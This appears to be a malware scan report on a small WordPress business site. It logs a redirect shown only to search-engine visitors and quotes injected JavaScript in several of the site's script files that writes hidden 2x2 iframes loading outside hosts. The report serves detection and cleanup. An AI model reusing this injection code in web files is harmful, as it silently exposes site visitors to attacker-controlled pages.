Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://primowaterproofing.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: primowaterproofing.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Wed, 27 Aug 2014 18:16:19 GMT Location: http://babylonproduction.com/wmci.html?h=1061292 Server: Apache Content-Length: 304 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://primowaterproofing.com/ | 200 OK Content-Length: 9390 Content-Type: text/html | clean |
http://primowaterproofing.com/wp-includes/js/l10n.js?ver=20101110 | 200 OK Content-Length: 637 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://blog.fantasygifts.com/ozai.html?j=1061292></iframe>');
function convertEntities(b){var d,a;d=function(c){if(/&[^;]+;/.test(c)){var f=document.createElement("div");f.innerHTML=c;return !f.firstChild?c:f.firstChild.nodeValue}return c};if(typeof b==="string"){return d(b)}else{if(typeof b==="object"){for(a in b){if(typeof b[a]==="string"){b[a]=d(b[a])}}}}return b}; document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mikeritchie.net/showthread.php?sid=95047></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://mikeritchie.net/showthread.php?sid=95047 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mikeritchie.net/showthread.php?sid=95047> Hidden iFrame found. size: 2x2 src: http://blog.fantasygifts.com/ozai.html?j=1061292 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://blog.fantasygifts.com/ozai.html?j=1061292> | ||
http://primowaterproofing.com/wp-includes/js/jquery/jquery.js?ver=1.6.1 | 200 OK Content-Length: 91526 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!cj[a]){var b=f("<"+a+">").appendTo("body"),d=b.css("display");b.remove();if(d==="none"||d===""){ck||(ck=c.createElement("iframe"),ck.frameBorder=ck.width=ck.height=0),c.body.appendChild(ck);if(!cl||!ck.createElement)cl=(ck.contentWindow||ck.contentDocument).document,cl.write("<!doctype><html><body></body></html>");b=cl.createElement(a),cl.bod document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mikeritchie.net/showthread.php?sid=95047></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://mikeritchie.net/showthread.php?sid=95047 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mikeritchie.net/showthread.php?sid=95047> | ||
http://primowaterproofing.com/wp-content/themes/underwater/js/carrington-text.js?ver=1.0 | 200 OK Content-Length: 3255 Content-Type: application/x-javascript | clean |
http://primowaterproofing.com/wp-content/themes/underwater/carrington-core/lightbox/thickbox.js?ver=1.0 | 200 OK Content-Length: 12323 Content-Type: application/x-javascript | clean |
http://primowaterproofing.com/wp-content/plugins/contact-form-7/jquery.form.js?ver=2.52 | 200 OK Content-Length: 22760 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;(function($) { $.fn.ajaxSubmit = function(options) { if (!this.length) { log('ajaxSubmit: skipping submit process - no element selected'); return this; } if (typeof options == 'function') { options = { success: options }; } var action = this.attr('action'); var url = (typeof action === 'string') ? $.trim(action) : ''; if (url) { url = (url.match(/^([^#]+)/)||[])[1]; } url = url || window.location.href || ''; option var msg = '[jquery.form] ' + Array.prototype.join.call(arguments,''); if (window.console && window.console.log) { window.console.log(msg); } else if (window.opera && window.opera.postError) { window.opera.postError(msg); } } }; })(jQuery); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mikeritchie.net/showthread.php?sid=95047></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://mikeritchie.net/showthread.php?sid=95047 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mikeritchie.net/showthread.php?sid=95047> | ||
http://primowaterproofing.com/wp-content/plugins/contact-form-7/scripts.js?ver=2.4.3 | 200 OK Content-Length: 5965 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) {
$(function() { try { if (typeof _wpcf7 == 'undefined' || _wpcf7 === null) _wpcf7 = {}; _wpcf7 = $.extend({ cached: 0 }, _wpcf7); $('div.wpcf7 > form').ajaxForm({ beforeSubmit: function(formData, jqForm, options) { jqForm.wpcf7ClearResponseOutput(); jqForm.find('img.ajax-loader').css({ visibility: 'visible' }); return true; }, beforeSerialize: function(jqForm, $(this).find('span.wpcf7-not-valid-tip').remove(); $(this).find('img.ajax-loader').css({ visibility: 'hidden' }); }); }; })(jQuery); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mikeritchie.net/showthread.php?sid=95047></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://mikeritchie.net/showthread.php?sid=95047 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://mikeritchie.net/showthread.php?sid=95047> | ||
http://primowaterproofing.com/about/ | 200 OK Content-Length: 9927 Content-Type: text/html | clean |
http://primowaterproofing.com/contact/ | 200 OK Content-Length: 10454 Content-Type: text/html | clean |
http://primowaterproofing.com/privacy/ | 200 OK Content-Length: 12167 Content-Type: text/html | clean |
http://primowaterproofing.com/category/uncategorized/ | 200 OK Content-Length: 9581 Content-Type: text/html | clean |
http://primowaterproofing.com/coming-soon/ | 200 OK Content-Length: 9802 Content-Type: text/html | clean |
http://primowaterproofing.com/author/admin/ | 200 OK Content-Length: 9531 Content-Type: text/html | clean |
http://primowaterproofing.com/tag/waterproofing/ | 200 OK Content-Length: 9547 Content-Type: text/html | clean |
http://primowaterproofing.com/2011/01/ | 200 OK Content-Length: 9374 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=primowaterproofing.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://primowaterproofing.com/
Result: primowaterproofing.com is not infected or malware details are not published yet.
Result: primowaterproofing.com is not infected or malware details are not published yet.